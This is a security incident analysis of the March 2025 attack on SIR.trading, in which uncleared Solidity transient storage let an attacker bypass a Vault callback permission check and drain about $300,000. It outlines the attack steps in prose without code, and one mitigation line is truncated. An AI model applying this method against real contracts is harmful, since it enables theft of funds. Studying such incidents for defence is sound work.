An On-Chain Heist Triggered by Transient Storage: The $300,000 Loss Behind It

On March 30, 2025, an Ethereum on-chain leveraged trading project named SIR.trading was attacked, resulting in asset losses exceeding $300,000. The security team conducted an in-depth analysis of the incident, revealing the details and reasons behind the attack.

Event Background

Attackers exploited the transient storage feature introduced in Solidity version 0.8.24. This new data storage location is designed to provide a low-cost, transaction-effective temporary storage method. The main features of transient storage include:

1. Low gas cost: The operation fee is fixed at 100 gas.
2. Transaction persistence: Data remains valid throughout the transaction.
3. Automatic clearing: After the transaction ends, the storage automatically resets to zero.

Source of Attack

The root cause of the attack lies in the fact that the values stored transiently using tstore in the function are not cleared after the function call ends. This allows attackers to construct specific malicious addresses to bypass permission checks and transfer tokens out.

Attack Process

1. The attacker creates two malicious tokens A and B, and creates pools for these two tokens on a certain DEX and injects liquidity.

2. The attacker calls the initialize function of the Vault contract to create a leveraged trading market using token A as collateral and token B as the debt token.

3. The attacker calls the mint function of the Vault contract, depositing the debt token B to mint leveraged tokens. During this process, the DEX pool address and the minting amount are temporarily stored.

4. The attacker creates a malicious contract with an address that matches the previously transiently stored minting amount.

5. The attacker successfully bypassed the permission check by calling the callback function of the Vault contract through a malicious contract, as the value in the transient storage was not cleared.

6. Finally, the attacker directly calls the callback function of the Vault contract by attacking the contract, transferring out other tokens (such as WBTC, WETH) to make a profit.

Capital Flow Analysis

According to the data from on-chain analysis tools, the attacker stole approximately $300,000 worth of assets, including:

• 17,814.8626 USDC
• 1.4085 WBTC
• 119.871 WETH

These assets were then converted to WETH and ultimately transferred to an anonymous tool. The attacker's initial funding source was 0.3 ETH transferred from that tool.

Security Recommendations

To prevent similar attacks, the project party should:

1. Immediately use tstore(key to clear the value in the transient storage after the function call ends.
2. Strengthen contract code auditing and security testing.
3. Use newly introduced language features with caution and fully understand their potential risks.

This incident again emphasizes the importance of maintaining a balance between security and the application of new technologies in blockchain project development. As technology continues to evolve, developers and security experts need to remain vigilant and promptly identify and respond to new security challenges.